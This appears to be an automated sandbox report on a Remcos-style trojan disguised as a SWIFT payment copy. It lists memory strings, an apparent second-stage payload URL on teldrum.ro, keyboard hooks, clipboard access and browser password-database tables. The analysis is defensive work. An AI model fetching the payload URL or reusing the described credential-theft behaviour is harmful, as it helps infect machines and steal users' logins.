                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFhty?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFsUC?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFu51?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFy7B?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFyKG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=60
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG88s?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGPXq?h=194&w=300&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGQtJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGV90?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=5
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGapF?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGlbE?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGmTG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGyYN?h=194&w=300&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH2Ml?h=194&w=300&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH6xB?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14hq0P?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aXBV1?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cEP3G?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cG73h?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ftEY0?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gEFcn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7gRE?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hg4?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481442526.0000000000193000.00000004.00000010.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481006058.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481039246.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481200929.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481236030.000000000226F000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481123706.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481986828.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480970839.000000000226C000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481006058.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481039246.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481200929.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481236030.000000000226F000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481123706.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481986828.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480970839.000000000226C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481442526.0000000000193000.00000004.00000010.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480424352.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/TI
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480970839.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478442693.0000000002272000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475707662.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475613079.000000000227D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476004168.000000000227D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480920497.000000000227D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?route=C512_BAY&stsid=S.BC4837E917425070&uaid=d9
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DhB9Gg0Em7s2jvLPGG9crywwB
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604&scid=1&mkt=en-US&Platform=Windows10&clienti
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?route=C512_BAY&uaid=b6de8762e4ae48b19a7d0d74ba392110
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/post.srf?mkt=en-US&platform=Windows10&id=80604&clientid=000000004807
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://teldrum.ro/
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32057397168.0000000002C60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://teldrum.ro/PmprpeY34.bin
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://teldrum.ro/PmprpeY34.bin0Pf
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://teldrum.ro/PmprpeY34.bin:Pl
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32057397168.0000000002C60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://teldrum.ro/PmprpeY34.binTrilsRexcrestereamuschilor.ro/PmprpeY34.bin
                  Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknown HTTPS traffic detected: 109.99.162.14:443 -> 192.168.11.20:49747 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 0_2_004052FE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052FE
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 3_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_0040987A
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 3_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,3_2_004098E2
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 4_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_00406DFC
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 4_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00406E9F
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 5_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004068B5
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 5_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004072B5

                  E-Banking Fraud

                  Source: Yara match File source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process Stats: CPU usage > 6%
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 3_2_00401806 NtdllDefWindowProc_W,3_2_00401806
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 3_2_004018C0 NtdllDefWindowProc_W,3_2_004018C0
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 4_2_004016FD NtdllDefWindowProc_A,4_2_004016FD
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 4_2_004017B7 NtdllDefWindowProc_A,4_2_004017B7
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 5_2_00402CAC NtdllDefWindowProc_A,5_2_00402CAC
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 5_2_00402D66 NtdllDefWindowProc_A,5_2_00402D66
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 0_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040330D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File created: C:\Windows\resources\0409
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28486179209.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28486047899.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28453587511.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32067121242.0000000033A5B000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe Binary or memory string: OriginalFileName vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe Binary or memory string: OriginalFilename vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.000000000041B000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@9/12@3/3
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 3_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,3_2_004182CE
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 5_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,5_2_00410DE1
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 0_2_004045CA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045CA
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 3_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,3_2_00413D4C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,0_2_004020CB
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Code function: 3_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,3_2_0040B58D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Mutant created: \Sessions\1\BaseNamedObjects\wealthymannow-3N54OZ
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsm9316.tmp
                  Source: z58Swiftcopy_MT.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe System information queried: HandleInformation
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32066847956.0000000033950000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28479559586.0000000002A91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480507737.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28482162830.0000000002A92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478473558.0000000002A91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                  Source: z58Swiftcopy_MT.bat.exe ReversingLabs: Detection: 21%
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe File read: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_4-33208
                  Source: unknown Process created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe Process created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"
